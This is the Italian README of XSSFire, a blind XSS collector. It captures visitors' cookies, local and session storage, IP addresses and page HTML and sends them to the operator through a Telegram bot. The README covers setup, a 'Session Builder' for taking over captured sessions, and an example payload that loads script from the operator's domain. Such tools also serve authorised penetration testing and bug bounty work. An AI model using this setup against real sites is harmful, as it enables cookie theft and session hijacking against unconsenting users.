XSSFire
Uno script standalone per Blind XSS.
Come funziona:
Lo script è una combinazione di PHP e JavaScript: cattura i dati usando JS e li invia allo script stesso, che poi genera file di report e li consegna tramite Telegram.
Requisiti:
- Web Server su Linux con un dominio e un certificato SSL.
- Account Telegram (per ricevere i report BXSS)
Perché Telegram?
Facile da configurare.
Veloce.
Raggiungibile.
Funzionalità:
- Cattura: IP, User-Agent, Data-Ora, Local Storage, Session Storage, Cookie, Referrer, Origin, URL, HTML, se innescato da un Iframe
- Session Builder: Uno JavaScript in grado di ricostruire la sessione: apri l'URL catturato e i devtools, incollalo nella console e premi invio. Se sei abbastanza fortunato puoi prendere il controllo della sessione.
- Notifiche Telegram: Più veloci e facili da configurare rispetto alle e-mail e più raggiungibili.
- Anti-Spam: Dovresti ricevere solo una/due notifiche per ogni URL catturato. Tuttavia, lo script si resetta di tanto in tanto per notificarti di nuovo in seguito.
- Crittografia: Puoi impostare una password nello script e il report che ricevi su Telegram sarà un file zip protetto da password. (I bot di Telegram non usano la crittografia end-to-end).
- Snapshot HTML: È un file HTML che verrà consegnato con il report; dovrebbe apparire simile alla pagina del tuo target.
Configurazione:
- Vai su Telegram e avvia una chat con @botfather.
- Scrivi /start nella chat e crea un nuovo bot.
- Dovresti ricevere il token del tuo bot quando lo crei.
- Metti da parte il token.
- Ora vai alla chat del tuo bot appena creato, avviala e salutalo.
- Poi vai su:
https://api.telegram.org/bot<bot_token>/getUpdates
- E salva il tuo chat id.
- Apri lo script XSSFire e modifica le seguenti righe:
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
- Carica lo script sul tuo server.
Per generare i payload puoi prendere in considerazione il Blind-XSS-Manager https://github.com/SeifElsallamy/Blind-XSS-Manager
Puoi semplicemente creare i payload tramite questa estensione inserendo yourdomain.com/
Nota: puoi cambiare il nome del file in index.php e caricarlo nella directory principale del tuo server per rendere i payload più corti; in tal caso il payload dovrebbe assomigliare a questo <script src="https://yourdomain.com"></script>.
Snapshot:
Grazie a GPT-3 xD